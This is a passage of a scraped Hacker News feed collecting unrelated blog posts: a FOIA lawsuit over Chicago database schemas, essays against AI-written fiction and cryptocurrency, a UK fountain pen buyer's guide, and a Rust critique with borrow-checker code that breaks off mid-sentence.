https://www.documentcloud.org/documents/25537825-document/#document/p180/a2624483
—Professional Services Agreement Between the City of Chicago Department of Finance and Department of Administrative Hearings and IBM Corporation: City of Chicago Violation, Noticing and Adjudication Business Process and System Support, p. 180 (2012)

Requesting Database Records from All City Databases

Sensing a pattern of a general failure to maintain data dictionaries, despite the City's public support for launching one, I submitted a FOIA request to every City agency for the following:

1. A short description of the database.
2. The names of the applications that are able to run queries/inserts.
3. All usernames and permissions
4. All database table names.
5. All column names in each table.
6. A description of each column.
7. Number of rows in each table.

A couple weeks later, Chicago's Department of Law sent me a letter on behalf of every agency and denied all parts, 1 through 7, of that request.

First, they argued that they would need to "create a new document":

First, no City Department is in possession of a document which contains the information you seek. The only way to compile the requested information, to the extent it is not exempt for one or more of the reasons noted below, would be to create a document.

Then, they requested a pedantic clarification about what "database" means:

Your request does not provide a definition of the term database. A commonly accepted definition of "database" is collection of pieces of information that is organized and used on a computer. http://www.merriam-webster.com/dictionary/database. Such a broad definition would include Excel spreadsheets. It would be unduly burdensome to the operations of each of the City's Departments to search every computer in use by its personnel in order to identify, open,review and catalogue each database and every Excel spreadsheet in the manner you request."

But even with all of that, they offered a helpful suggestion, and pointed to the City's "data dictionary":

Please note that in late 2013, the City of Chicago launched a publically available Data Dictionary which can be found at http://datadictionary.cityofchicago.org/. It is described as “a resource for anyone who is interested in understanding what data is held by City agencies and departments, how and if it may be accessed, and in what formats it may be accessed.”

Cool! It's a damn shame the system shutdown less than a year later, though.

"Metalicious": Chicago's Failed Data Dictionary

A lot of government agencies have absolutely recognized the problem of the public not knowing what information exists, including Chicago. One such attempt at fixing this problem is to voluntarily make the columns and table names of their databases open to the public, like the Department of Justice's PDFs of table names, column names, and descriptions of both.. There's even an open specification for government database schemas!

But even with agencies voluntarily making schema information public, such releases are effectively discretionary and are outside of the realm of FOIA.

One such release of discretionary information, as the Department of Law mentioned in their denial letter, is the 2013-released city-wide data dictionary project called "Metalicious". That's the actual name.

Metalicious was funded by a $300,000 John D. and Catherine T. MacArthur Foundation grant to UChicago's Chapin Hall, with the intended purpose of making table names, column names and descriptions of both publicly accessible. It's the City's "data dictionary".

CANVAS!

Schema information of the Chicago Budget System on Metalicious (2016)

An example of a system whose database schema information is released was the Chicago Budget System (CBS). A total of 110 tables are listed, with descriptions and a link to each table's columns. An interesting table worth investigation on its own is, BOOK_ALDERMANIC_PAYRATE, which is described as, "data used for creating pay schedule for aldermanic staff published in the Budget Book". Good to know!

Metalicious received some attention in civic data circles:

Journalists and civic inquisitors can use it to determine what information is available when composing Freedom of Information Act requests. Based on my own experience, knowing what to even ask for has been a challenge. All that is over.

All That Is Over: Its Inevitable Shutdown

Within a few short years, the project ostensibly shut down and its front page was replaced with a message about being down for "temporary maintenance". That temporary maintenance has been ongoing for about nine years now.

Down For Maintenance

Back in 2018, I asked the City's now-former Chief Data Officer Tom Schenk why it was shut down, and he explained:

Metalicious was retired because of lack of resources to expand it (originally grant funded). It had some, but very, very small proportion of databases. There was security review of any published data and some information was withheld if we felt it could undermine the application security. By Info Sec policy, it is confidential information until a review deems it appropriate for public release--same as the open data workflow which mirrors the FOIA workflow.

RIP.

Down For Maintenance |Last-Known Running | Metalicious GitHub

Requesting Metalicious

Okay, that's not surprising, but since the first goal here was to figure out whether column and table names are requestable, I submitted my request for the MySQL dump of Metalicious. As these things go, that request was also denied:

Please be advised the Department of Innovation and Technology neither maintains nor possesses any records that are responsive to your FOIA request.

So, I submitted another request and was sure to included a quote from a press release that was explicit about the Department's ownership of Metalicious.

They eventually sent me a copy of a MySQL dump with about 150 databases' columns and table names, including their descriptions. Neat! Progress!

To me, this reasonably shows that the City can provide table names and column names of City databases under IL FOIA.

The CANVAS Request and Trial

This brings us back to the FOIA request for the CANVAS database schema, which was twice appealed and died at the Illinois Supreme Court.

The request included a SQL statement for the City to run in order to fulfil the request. I made some small mistakes that bit me later, which is ripe for another whole post. Essentially, the City denied the request by arguing that the release of this information would jeopardize the security of Chicago's systems:

Your request seeks a copy of tables or columns within each table of CANVAS. The dissemination of these pieces of network information could jeopardize the security of the systems of the City of Chicago.  Please be advised that even if you were to narrow your request, certain records may be withheld from disclosure under the exemptions enumerated in the FOIA, including but not limited to the exemption set forthin 5 ILCS 140/7(1)(o).

I disagree wholeheartedly and Thomas Ptacek goes into more detail in his companion post.

Upon recieving this denial, I reached out to my attorneys at Loevy & Loevy who agreed to sue.

"Civic Hacker"

Eventually there was a trial in January 2020. During the trial, the City's attorneys argued that my intent was nefarious:

They are seeking the ability to have information that helps Mr. Chapman, civic hacker, go into the system and manipulate the data for whatever means he sees fit. That is not something that FOIA requires the City to do.

I have no idea where they came up with the idea that I wanted to manipulate their data, especially considering that just four months earlier, I was asked to help the City with parking ticket reform.

While we were waiting for the trial date, Kate LeFurgy, Director of Comms for the Office of the Mayor, reached out to me and asked if I could help with some parking ticket analysis (for free). I agreed, and compiled a spreadsheet detailing how a large number of vehicles received a disproportionate number of tickets—groupings that highlight, for example, one vehicle which received at least three tickets per week for 41 continuous weeks.

This is incredible. I can't thank you enough as to how helpful this was. I truly appreciate your time and talents on this work. It has been invaluable in shaping the reform measures we hope to put in place later this year.
-Kate LeFurgy | Fri, Aug 23, 2019

Those good spirits did not last long, and LeFurgy did not respond to my emails asking for thoughts on the CANVAS litigation.

Privacy When It's Convenient

Chicago's expert witness, Bruce Coffing, said in court:

In this particular case we are saying, I'm saying that from defending this, our constituents' information, their private information, one of the things that helps us defend that system is not making this [schema information] available.

It is not the only thing we do. We do many things. But I don't want to make it easier for the bad guys and bad gals out there to attack our system and let— put our constituents' private data at risk.

This argument is striking to me, because the City has already shared so much private data through FOIA.

For instance, in 2018, when I requested parking ticket data from the Department of Finance, their FOIA officer told me that they could not include both license plates andthe vehicles' registered address. To resolve this issue, they offered to remove license plate data and only provide addresses.

However, they had already given me the license plate data of millions of ticketed vehicles, in response to a different, earlier FOIA request. So, I received registered home addresses from one request, and license plates from another.

The responsive records from these two separate FOIA requests can easily be paired.

To demonstrate the extent of this problem, I created this visualization which shows the scale of private information disclosed by the Department of Finance: vehicle addresses from every U.S. state, including 11,057 unique addresses of Texas vehicles and 48,707 from Michigan.

I've been told by a reliable source that the Department of Finance no longer sends license plates nor registered addresses in response to FOIA requests.

Next Steps

The whole point of this entire thing was to make it easier to request data through FOIA. Ultimately, the goal is to simply send a SQL statement to an agency for them to run, and avoid so much of the usual nonsense. Basically, an API.

Relatedly, these two bills from last year were interesting, and sought to fix the IL Supreme Court's bad decision. But they didn't go anywhere during last year's session.

Fortunately this year, a new bill was filed with the addition of this language:

[...] and shall include the identification and a plain-text description of each of the types or categories of information of each field of each database of the public body. [...] and shall provide a sufficient description of the structures of all databases under the control of the public body to allow a requester to request the public body to perform specific database queries.
That's pretty neat! I hope it passes.

]]>
https://mchap.io/losing-a-5yr-long-illinois-foia-lawsuit-for-database-schemas.html hacker-news-small-sites-43237352 Mon, 03 Mar 2025 01:30:12 GMT
<![CDATA[Netflix's New Metric, Linux Mysteries, Smarter Revenue Pipelines]]> thread link) | @dytpq0404
March 2, 2025 | https://newtler.com/briefing/c8345ba241 | archive.org

Unable to extract article]]>
https://newtler.com/briefing/c8345ba241 hacker-news-small-sites-43237332 Mon, 03 Mar 2025 01:26:36 GMT
<![CDATA[The Empty Promise of AI-Generated Creativity]]> thread link) | @parisidau
March 2, 2025 | https://hey.paris/posts/genai/ | archive.org

“Are you going to add AI writing to Yarn Spinner?” It’s a question I hear almost weekly these days. Whether at game development conferences, online, or during meetings, there’s an assumption that every tool is racing to implement some form of generative AI. I understand the curiosity—we’re living through an unprecedented wave of AI hype, and there’s genuine confusion about where these technologies might fit into creative processes. So I thought I’d share some thoughts on why we’re taking a different path.

As co-founder of Yarn Spinner, I’ve reviewed countless examples of AI-generated narrative content. The verdict? Uniformly disappointing—derivative, hollow, and lacking the coherent creative thread that defines meaningful human expression. This isn’t just opinion; it’s why we’ve taken an uncompromising position: Yarn Spinner will never integrate AI that writes for you.

What strikes me about AI-generated stories, dialogue, and characters is their inherent mimicry. These systems don’t create—they rearrange existing patterns from their training data. The results feel like pale echoes of authentic work, with a distinctive blandness that comes from averaging thousands of human voices into statistical patterns. Even the most “impressive” AI-generated narratives fall apart under scrutiny. They meander without purpose, introduce plot elements they forget about, and create characters without consistent motivations. The creative thread—that intentional through-line that guides meaningful work—is conspicuously absent.

This isn’t merely a technical limitation to be overcome with more data or better algorithms. It’s a fundamental issue: AI systems lack lived experience, cultural understanding, and authentic purpose—all essential elements of meaningful creative work. When humans craft stories, they draw upon personal struggles, cultural tensions, and genuine emotions. AI simply cannot access these wellsprings of authentic creation. It can only simulate their surface patterns, producing work that feels uncanny and hollow—recognisable as creative work in form but not in substance.

Beyond the quality issues, we must confront the ethical problems. These AI systems are trained by scraping millions of human-created works without permission or compensation. They represent a massive appropriation of creative labour—taking without giving back. Using such systems means benefiting from this problematic extraction. It legitimises a model where human creators are exploited rather than valued.

To be crystal clear: Yarn Spinner has absolutely no plans to incorporate generative AI into our products—not now, not ever. We’ve seen the disappointing results these systems produce, and we’ve witnessed their failure to generate narratives with the depth, coherence, and meaning that human writers create naturally. Some suggest AI could have limited applications as tools under human control. But even for these narrow use cases, we remain unconvinced at the moment. The risks of normalising AI in creative processes outweigh any marginal benefits these systems might offer.

What troubles me most is how AI threatens to devalue human creativity by suggesting that the creative process itself—the vision, the intention, the evolution—doesn’t matter. When we pretend an AI can write “good enough” stories, we misunderstand what stories are: not just words arranged in pleasing patterns, but acts of human connection and meaning-making.

Every game narrative created by a human writer carries their unique perspective and intention. Players don’t just experience content; they engage with another human’s vision of the world. No algorithm can provide this human-to-human connection, regardless of how statistically sophisticated its output might be.

The game industry faces a choice between expediency and authenticity. The path of least resistance leads toward automation—replacing human creativity with algorithmic approximations. This path (questionably) promises cost savings but delivers creatively bankrupt experiences. At Yarn Spinner, we build tools that amplify what creative people can do, never tools that attempt to do the creating for them. We respect the creative process too much to automate it away.

As more creative tools rush to integrate AI that produces weak, derivative content, our stance becomes clearer: we stand for authentic human expression in an industry increasingly willing to settle for less. I invite others to join us in drawing this line. Not because we fear technology, but because we’ve seen what AI-generated content actually delivers—and it’s simply not good enough. Human creativity, with all its messiness and brilliance, remains irreplaceable. And that’s something worth protecting, even when—especially when—the technological tide pushes in the opposite direction.


Cover Image by Patrik Houštecký from Pixabay

]]>
https://hey.paris/posts/genai/ hacker-news-small-sites-43237242 Mon, 03 Mar 2025 01:13:51 GMT
<![CDATA[The "strategic reserve" exposes crypto as the scam it always was]]> thread link) | @kolchinski
March 2, 2025 | https://alexkolchinski.com/2025/03/03/the-strategic-reserve-exposes-crypto-as-the-scam-it-always-was/ | archive.org

Today, President Trump announced that the US Government would begin using taxpayer dollars to systematically buy up a variety of cryptocurrencies. Crypto prices shot up on the news.

This is revealing, as crypto boosters have argued for years that cryptocurrency has legitimate economic value as a payment system outside of the government’s purview.

Instead, those same crypto boosters are now tapping the White House for money — in US Dollars, coming from US taxpayers.

Why?

Crypto has been one of the biggest speculative bubbles of all time, maybe the single biggest ever. Millions of retail investors have piled into crypto assets in the hope and expectation that prices will continue to go up. (Notice how much of the chatter around crypto is always around prices, as opposed to non-speculative uses.)

However, every bubble bursts once it runs out of gamblers to put new money in, and it may be that the crypto community believes that that time is near for crypto, as they are now turning to the biggest buyer in the world — the US Government — for help.

This shows that all the claims that crypto leaders have made for years about crypto’s value as a currency outside of government control have been self-serving lies all along: the people who have most prominently argued that position are now begging the White House to hand them USD for their crypto.

It also reveals how much crypto has turned into a cancer on our entire society.

In previous Ponzi schemes, the government has often stepped in to defuse bubbles and protect retail investors from being taken in by scammers.

But in this wave, not only has the government not stepped in to stop the scam, it has now been captured by people with a vested interest in keeping it going as long as possible.

Our president and a number of members of his inner circles hold large amounts of cryptocurrency and have a vested interested in seeing its value rise — Trump’s personal memecoin being a particularly notable example. And many other people in the corridors of power in Washington and Silicon Valley are in the same boat. “It is difficult to get a man to understand something, when his salary depends on his not understanding it”, and so some of the most prominent people in the country are now prepared to make any argument and implement any policy decision to boost the value of their crypto holdings.

How does this end?

Once the US taxpayer is tapped out, there’s not going to be any remaining larger pool of demand to keep crypto prices up, and in every previous speculative bubble, once confidence evaporates, prices will fall, probably precipitously. Unfortunately, as millions of people now have significant crypto holdings, and stablecoins have entangled crypto with fiat currency, the damage to the economy may be widespread.

The end of the crypto frenzy would, in the end, be a good thing. Cryptocurrency has a few legitimate uses, like helping citizens of repressive regimes avoid currency controls and reducing fees on remittances. But it has also enabled vast evil in the world. Diverting trillions of dollars away from productive investments into gambling is bad enough, but the untraceability of crypto has also enabled terrorist organizations, criminal networks, and rogue states like North Korea to fund themselves far more effectively than ever before. I’ve been hearing from my friends in the finance world that North Korea now generates a significant fraction, if not a majority, of its revenues by running crypto scams on Westerners, and that the scale of scams overall has grown by a factor of 10 since crypto became widely used (why do you think you’re getting so many calls and texts from scammers lately?)

I hope that the end of this frenzy of gambling and fraud comes soon. But in the meantime, let’s hope that not too much of our tax money goes to paying the scammers, and that when the collapse comes it doesn’t take down our entire economy with it.

Thanks to Alec Bell for helping edit this essay.

]]>
https://alexkolchinski.com/2025/03/03/the-strategic-reserve-exposes-crypto-as-the-scam-it-always-was/ hacker-news-small-sites-43236752 Mon, 03 Mar 2025 00:08:56 GMT
<![CDATA[The UK Fountain Pens Buyer's Guide]]> thread link) | @susam
March 2, 2025 | https://ukfountainpens.com/the-ukfp-buyers-guide/ | archive.org

Looking for a fountain pen? You’ve come to the right place. Well, one of them. There are no shortage of people on the internet looking to give you advice about which pen to buy.

I’m going to set a few rules of engagement here.

  1. I’m talking about pens that you can buy domestically in the UK, from known manufacturers and known retailers, at common street prices. If you’re reading a buyer’s guide, you’re probably not up for importing or going for completely unknown brands.
  2. I’m going to list out pens that I think are “contenders” in a given category; this will absolutely not be a comprehensive list.
  3. I’ll only comment on pens that I’ve tested or feel that I have a solid opinion on. This will consciously exclude certain brands — I have a deep instinctive loathing for Cross, for some reason, for example. Think I’ve missed something? Write in.
  4. I’ll stop at £250. If you’re spending more than that, you’re either a rich idiot buying your first pen, or you have some experience with pens and can guide yourself to individual reviews to validate the pens you’re interested in. You don’t need a buyer’s guide.

First pen: £10–£20

With the influx of Chinese pens like the Jinhao 992 you can now buy a perfectly serviceable steel-nibbed fountain pen, with converter, for less than a cup of coffee from Starbucks.

2017-06-16 21.16.19

The range of models is changing and growing all the time. There are even Japanese pens like the Platinum Preppy under this price range. I’ll say it straight: unless you’re really struggling financially you do not need advice from me about which pen under £5 to get. Buy a couple each month, try them out, give them to kids at your local school.

But, if you’re looking to buy your first pen around £15, it can seem like a big investment. Buy the wrong one and you might have a horrible experience of fountain pens and go back to ballpoints. This decision matters.

The contenders:

Lamy Safari: £18

The default recommendation is one of Lamy’s bright and breezy pens. I’ve never owned a Safari — I jumped straight to the aluminium version, known as the Al Star, which is out of this price range. But I have owned some of Lamy’s other budget offers, all of which use the same nib and basic formula. You have the choice of the Safari in its dozens of plastic colours, but it’s also available in transparent guide as the Vista,  in kid-friendly guise as the ABC, and in funky alu+plastic as the Nexx, all in this price range. I’ve always had a good experience with Lamy steel nibs, from extra fine up to broad. Build quality is good, they take very competent converters, and you can pick one up in your local branch of Paperchase for less than £20. In the hand they’re a good size — the only thing you need to figure out is whether you like the triangular shaped grip.

Kaweco Sport: £18

I really like the Sport design and have two of them at the moment (an Art and Al), but I’ll dismiss the basic one pretty quickly. Unless you are explicitly on the lookout for a “pocket pen”, you’ll probably find the Sport a bad first pen, because it’s quite small (same reason I won’t recommend the Al Sport or the Liliput in later categories). But there are three other reasons to skip over it: first, in my experience Kaweco nib quality control is hit-and-miss, so as a beginner you’re more likely to end up with a pen that doesn’t write well. Second, finding a good converter for the Sport is a bit tricky, and the quicker you get off cartridges into the wonderful world of bottled ink, the better! Third, the nib unit on the basic Sport isn’t swappable, which limits you for all kinds of reasons.

Kaweco Perkeo: £15

The Perkeo is a better choice than the Sport, because it’s larger and — from my experience and others — it has a better nib than the Sport, too. Only downside is that it doesn’t have a clip.

2017-09-17 17.15.00

My recommendation:

I’d either go for the Lamy Nexx or the Kaweco Perkeo.

Stepping up: £20–£50

This is where pens get interesting and the choice gets much wider. You’re still in steel-nib territory, of course, but the materials and build quality are superior. This is the sweet spot for many people. One key omission here is the Caran d’Ache 849 — I’ve not tried it because I don’t like how it looks and it’ll be way too narrow for me.

Lamy Al Star or LX: £25+

The LX is overpriced — you’re paying for packaging. The Al Star is a better deal, giving you the Safari experience but with a more robust aluminium shell, which comes in some snazzy colours. I had a beautiful orange one; the Pacific Blue is also lovely.

Lamy Aion: £49

The Aion is built like a tank, beautiful in an understated way, has a proper designer’s name on it, and most importantly writes wonderfully. Mine has one of the best EF nibs I’ve ever used. You could keep this pen in your work bag and never want for another.

DSC01058

TWSBI Eco: £30

To me the Eco is the clear winner in TWSBI’s range. It has none of the fragility of the Classic, the fussiness of the Diamonds, or the difficulty of cleaning that plagues the Vacs. And it’s cheaper than all of them.

You get a stout plastic box with all the tools and instructions you need for disassembly. It comes in a few colour variants, but all with a demonstrator barrel, and the nibs I’ve used (F and B) have been absolutely fantastic. Cleaning is a breeze and the only annoyance you’ll find is people mistaking your pen for a vape.

Faber-Castell Ambition or Loom: £28+

I’ve never owned either of these pens, but I have owned an Ondoro, which has the same nibs. Others say it, and I agree: FC makes some of the best steel nibs out there (although I didn’t like the Ondoro for other reasons). Definitely check these out if you like the styling.

2017-01-16-20-36-20

Lamy Studio: £46

This is an unpopular opinion but I don’t much like the Studio. I owned one and enjoyed it, but ultimately sold it. The step-down from barrel to section bothered me. The Aion is ultimately the superior pen.

My recommendation:

At the bottom end of this price range, go for an Eco. If you want something with a bit more weight to it, go for the Aion.

Getting serious: £50–£100

The choice here is getting broad and look, I’ll be honest, there are a lot of pens I haven’t reviewed here. Conklins, Karas, Loclen, Cleo Skribent, Visconti Rembrandt…

Some of the pens I’ve previously mentioned (and dismissed) fall into this category. The Al Sport, Ondoro, TWSBI Vac and Classic, etc. So what follows is ALL NEW.

Tactile Turn Gist: £69+

The Gist is an incredibly well thought-out and innovative design, with a grippy finish, square-cut threads, and interesting material choices. It has a strong clip, long section and tight finishing.

DSC00976.JPG

Pelikan M200: £88+

I like big pens but can’t let go of my M205. It’s a nice smooth piston-filler with a wet steel nib. Sure, it’s small and the design is pretty unassuming, but it is just a great writer.

Platinum 3776: £99

YES. At Cult Pens, you can get a 3776 for less than a hundred quid. And that’s including all the crazy special nibs like the ultra extra fine, the soft fine, and the extra broad. You’re getting an in-house gold nib, one of the best around, plus a practical slip-and-seal cap that will keep your ink from drying out. Sure, the 3776 doesn’t feel as premium as some other pens, but it’s an absolute steal.

My recommendation:

For Chrissake, get a Platinum 3776.

DSC00865.JPG

Going for gold: £100–£175

At this price range, you have a metric ton of choice. I mean, loads. Just from the pens I’ve reviewed, you’ll find the Karas Decograph, Edison Beaumont (and other models), most of the small Pilots when bought from the UK (91, 92, possibly 912), Ystudio’s metal designs… and then there’s the Waterman Carene, Parker Sonnet, Visconti Van Gogh, Platinum President, Conklin Mark Twain, Graf Tamitio, Diplomat Aero… the list just grows.

If you want to avoid madness, I’d recommend considering just the following:

Lamy 2000: £122+

I won’t pull a cliffhanger here: this is the pen I’d recommend. Every collection deserves a 2000. The design really is the definition of iconic. The Makrolon and stainless steel is classy and comfortable. It’s a piston filler with ink window, the hooded gold nib is wet and smooth, the slip cap practical.

DSC00867

Pilot Capless: £149+

Most people end up at some point wanting and getting a Capless/Vanishing Point, or one of its variations, the slimline Decimo or twisty Fermo. There are a gazillion colours and finishes to choose from. I personally find the modern Vanishing Point design ugly and uncomfortable. Others love it. What’s indisputable is that again, it’s an iconic design and engineering feat, and you get a gold nib.

Pilot 92: £155

A handsome demonstrator, gold-nib piston filler with Pilot build quality. I found it a bit small and a bit dry in the end, but if you want a gold piston filler at this price range, you’ve got a choice of the 2000 or this.

DSC00560

Franklin-Christoph: £125+ (dollar converted)

I’ve owned two Franklin-Christoph pens, and I can’t say enough good things about the inventive materials and innovative designs this small US company produces. Putting giant threads right at the end of the pen is an inspired decision for comfort and distinctiveness. I really like the Pocket 66 and Model 02 designs, but you can take your pick. The only thing to note is that at this price, you’re getting a steel nib. Franklin-Christoph designs not floating your boat? Try Edison for some more traditional styles.

DSC00973

My recommendation:

For Chrissake, get a Lamy 2000.

Topping out: £175–250

Lamy Dialog 3:

Sailor Pro Gear:

Pelikan M400/M600:

]]>
https://ukfountainpens.com/the-ukfp-buyers-guide/ hacker-news-small-sites-43235144 Sun, 02 Mar 2025 21:10:30 GMT
<![CDATA[Passes.com and Lucy Guo accused of distributing child pornography [pdf]]]> thread link) | @cuuupid
March 2, 2025 | https://www.csvllp.com/wp-content/uploads/2025/02/2025.02.26-1-Complaint.pdf | archive.org

Unable to extract article]]>
https://www.csvllp.com/wp-content/uploads/2025/02/2025.02.26-1-Complaint.pdf hacker-news-small-sites-43234686 Sun, 02 Mar 2025 20:27:55 GMT
<![CDATA[Is Rust a good fit for business apps?]]> thread link) | @pjmlp
March 2, 2025 | https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ | archive.org

While you may hear a lot of harsh words about Rust is this rant, that doesn't have to mean it's a bad language. Rephrasing the classic: there are two types of programming languages: ones that people complain about and ones that nobody uses. I've started my journey with Rust in 2018 and I've been working in it full time since 2021.

I love Rust a lot for many things: good std lib abstractions, ergonomics (to some extend), the best build toolchain in the world (I've tried many things, but cargo is easily number one across programming languages landscape). But mostly I love how it brought sanity into systems programming and gave a viable alternative to this hollow abomination called C++ (and CMAKE).

But what do I mean by term business apps? Nowadays, its all sorts of services targeting various kinds of user/asset management, be it a bank portal, online shop or any other sort of ERP systems. This also covers ETL to huge extend, as they bring your focus outside of main concerns that Rust shines in.

These systems usually have similar shell: a web service providing some API, a database to manage system information and all sorts of other service connectors.

These systems are characteristic because their main complexity comes from the domain: which is not hardware/software related but it's more about modelling complexities of human interactions in code. Quite often the most performance-sensitive parts related to I/O access (databases, HTTP communication) and serialization and solved by tuning access to the other services we use, not the algorithms we write ourselves.

These systems where famously written in many different languages, from Python/Ruby/JavaScript/PHP to Java/C#/Go. Question is: are business apps a good use case for Rust?

Spoilers: in my opinion, No. Now lets explain why.

Standard library

One of the nice things about Rust is that its abstractions defined in standard library feel right in size and scope. On the other side, std lib itself is woefully lacking: no RNG, cryptography or serialization. Even some things that should have been language features since day one - like async traits and yield generators - are supplied as 3rd party macros.

On the other side Rust package ecosystem is enormous. You have everything, from universal abstraction over file system with dozen of services supported, down to cross-platform Bluetooth driver that you can use to (literally) connect to your butt plug.

While languages such as Go enable you to write pretty much entire HTTP service from standard lib alone, this bazaar-style package management comes with the burden: whenever you need to solve any mundane problem, you land in a space where everything has at least 7 different crates available, but half of them are actually a toy projects and most of them were not maintained for the last 5 years. And don't get me started about audits to check if one of 600 dependencies of your hello world app won't be used for supply chain attacks.

It takes time and attention to to sift the wheat from the chaff. Attention that is limited and could be put to better use elsewhere.

And while many of these concerns have sense in systems programming, since they cover very different environments with very slim-tailored constraints - like WASM in the browser or embedded devices where even Rust's minimal standard lib is too much - they don't matter so much in a context of business apps, where solid defaults for common problems are desired: which is one the reasons for Go and .NET popularity in this domain.

Not abstract enough

One of the fantastic parts of Rust is that it manged to - mostly - live up to credo of zero-cost abstractions: situation where the performance of your high abstracted code (i.e. iterator ops or futures) is basically the same as their hand-rolled equivalent.

The problem is that Rust comes with some new concepts like lifetimes and mutability modifiers, that cannot be properly abstracted to the same degree as regular generics.

If you played with Rust you probably already seen those different kinds of iterators for mutable/immutable references, which basically have the same implementation but require twice the boilerplate code. The reason why is that mutability is not a generic property in Rust and cannot be abstracted over.

Some languages like Pony offer an ability to control read/write access to fields and variables, but does it in a way that enables safe "casting" between them. PS: I highly recommend learning Pony for its reference capabilities concept alone, which initially may seem to be more complex than Rusts mutability and borrow-checker but in practice is much more robust and avoids many pitfalls that Rust has, especially in multi-threaded programming.

Dynamic trait references

Since this rant already came to the topic of abstractions, let's talk about dyn Trait. First, let me praise Rust decision about explicitly showing references responsible for doing a virtual table dispatch in code.

However Rust also decided to turn Box<dyn Trait>/Arc<dyn Trait> into fat pointers (similar to Go, and opposite to Java/.NET).

Short explanation: unlike Box<T> which is basically a memory pointer, a memory representation for Box<dyn T> is two pointers - one for type's virtual table, and one for heap address where the corresponding object lives. This comes with few consequences:

  • If you're working with C foreign function interface, there's no right C primitive to support you. You need to rollout something of your own, that most likely won't be compatible with existing solutions. Bizarre design decision given how important native interop is for Rust.
  • If you want to introduce a lock-free mutability via Compare-And-Swap API (like the one that arc-swap offers) and use dynamics at the same time... well, get fucked. You'll need extra layer of indirection, since this API is only available for pointer sized things.
  • Some of the Rust APIs restrict you to work over Sized data - a types which size can be determined at compile time - which unfortunately puts a limitations on your generic params, i.e. if you ever want to use them in Box<T> context (since box pointer will have different size depending on what a T is).

Rust provides a workaround in form of dedicated crates that offer thin dynamic pointers as well, but since they are not part of standard lib, it's unlikely that you'll be able to use them across different libraries in the ecosystem without extra work.

Borrow checker: early adopter syndrome

One of the biggest value proposals of Rust is borrow checker. If you ever thought about reasons to learn Rust: a borrow-checker and ownership model is the one. It changes the way how you think about object graphs.

Rust is probably the first language that adopted borrow-checker as a regular tool in the non-esoteric language. However it comes with some drawbacks: at its current stage the borrow-checker is still not very advanced and extremely conservative, requiring programmer to do a lot of defensive programming and workarounds in order to make it happy. And most likely it will never be improved beyond minor points, as this would require a breaking change.

In short: you can imagine borrow-checker as a recursive read/write lock enforced on all fields and variables at compiler level - at any time you can have multiple read-only references to the same object or one read-write reference, but never a mix of two. Additionally in order to have a reference of given type to a field in an object graph, you need to have the same (immutable/mutable) or stronger (mutable) reference to its parent.

If we think in category of locks, you can imagine a deadlock problem: when A needs to wait for B, and B needs to wait for A to acquire their corresponding locks. In Rust borrow-checker, such situations are compiler errors. The same logic is used by Rust to operate on actual locks, but don't worry: it doesn't mean that Rust is deadlock free language.

What it means however, is that there's no easy way to represent cyclic data structures in Rust (here's description of famous double-linked list problem), since - unlike pretty much any other language - it explicitly disallows you to have two mutable/immutable references to the same variable (even in the same thread).

And speaking of cyclic data structures: you can actually sometimes implement them in straight forward manner with Rc<RefCell<T>>/Arc<Mutex<T>>, but the problem is that:

  1. RefCells can easily blow up since they work the same way like borrow-checker, but during runtime, while Mutex can deadlock at runtime. Neither of them is "zero cost".
  2. You need to keep track of references with strong and weak pointers, which is usually not an issue unless your object graph needs to be a bit more complicated for some reason. If not, you'll get a memory leak. One of the Rust promises was to reduce these, but it only works in comparison to traditional "systems" languages like C/C++. This comparison falls apart against managed languages.

I get why it's there, but forcing it blindly and everywhere as a default behaviour is fucking bullshit: which apparently is acknowledged by the authors themselves, since the common way of getting immutable/mutable reference from an array is to split it into two separate references using method that operates using unsafe pointers under the hood. Shutout to all haters saying that unsafe Rust is not idiomatic: it's not only idiomatic, it's necessary.

Borrow checker and encapsulation

Another thing about borrow checker is that it has very shallow understanding of your code. It also explicitly makes a conservative assumption that if you call method over some reference, this method will try to access ALL fields of that references, forcing any other field accessed outside of it to be invalidated.

Let's check this out on a following example:

struct X {
    commit_offset: usize,
    entries: HashMap<u32, Vec<Entry>>,
    changed: HashMap<u32, Vec<usize>>,
}

impl X {
    fn change_uncommitted<F>(&mut self, client: &u32, f: F)
        where F: Fn(&mut Entry) -> bool 
    {
        let mut i = self.commit_offset;
        if let Some(entries) = self.entries.get_mut(client) {
            // get iterator over uncommitted entries for given client
            for e in entries.as_mut_slice()[self.commit_offset..].iter_mut() {
                if f(e) {
                    let changed = self.changed.entry(*client).or_default();
                    changed.push(i);
                }
                i += 1;
            }   
        }
    }
}

Now let's try encapsulate it a little to make it more readable - nothing much, just encapsulate our cryptic for iterator statement to give it some context:

impl X {
	/// get iterator over uncommitted entries for given client
    fn get_uncommitted(&mut self, client: &u32) -> Option<&mut [Entry]> {
        let e = self.entries.get_mut(client)?;
        Some(&mut e.as_mut_slice()[self.commit_offset..])
    }
    
    fn change_uncommitted<F>(&mut self, client: &u32, f: F)
        where F: Fn(&mut Entry) -> bool 
    {
        let mut i = self.commit_offset;
        if let Some(entries) = self.get_uncommitted(client) {
            for e in entries.iter_mut() {
                if f(e) {
	                /// compilation failure: get_committed already borrowed
	                /// `&mut self` in a scope of if let, so we cannot access
	                /// `self.changed`
                    let changed = self.changed.entry(*client).or_default();
                    changed.push(i);
                }
                i += 1;
            }   
        }
    }
}

The second implementation will fail. Not because it's wrong, not because we broke something (in fact these two implementations are identical), but because it makes borrow checker sad.

This is in fact recurring theme: when working in Rust, you'll often find yourself in situation when you need to split your types or methods in specific way, just because borrow checker says so. It's mandatory, even when it adds no value (or straight up removes it) to your project.

Performance ceiling vs time to performance

One of the common misconceptions about Rust is that apps written in Rust are fast because they are written in Rust. This is true to some extent if we compare them against dynamic languages like Python, Ruby or JavaScript, but it falls short when we start comparison with services written in i.e.. Go, Java or .NET.

This is may be due to oversimplified view on the performance characteristics of real-world apps:

  1. Winning hyper optimization wars in micro-benchmarks rarely translate to visible results in business apps, where our own code is usually ~10% of the overall executed: rest is databases, web stacks, serializers etc.
  2. For those apps most of the optimizations are either done by proper database and network usage, system architecture and right algorithm pick. Language wrestling matters a lot less, at least when we talk about languages in the same performance "weight class".

Moreover, picking Rust may cause a let-down in expectations about performance - I've seen people writing their apps in both Rust and i.e.. C# and noticing that their C# apps were actually faster. This again comes from another issue: when you first try, you probably will write your Rust app just well enough to make it compile, do actual task and avoid glaring performance issues. Most likely you'll stick to its defaults and - in business setting - this will be the last time when you try to optimise that piece of code.

This boils down to the difference between:

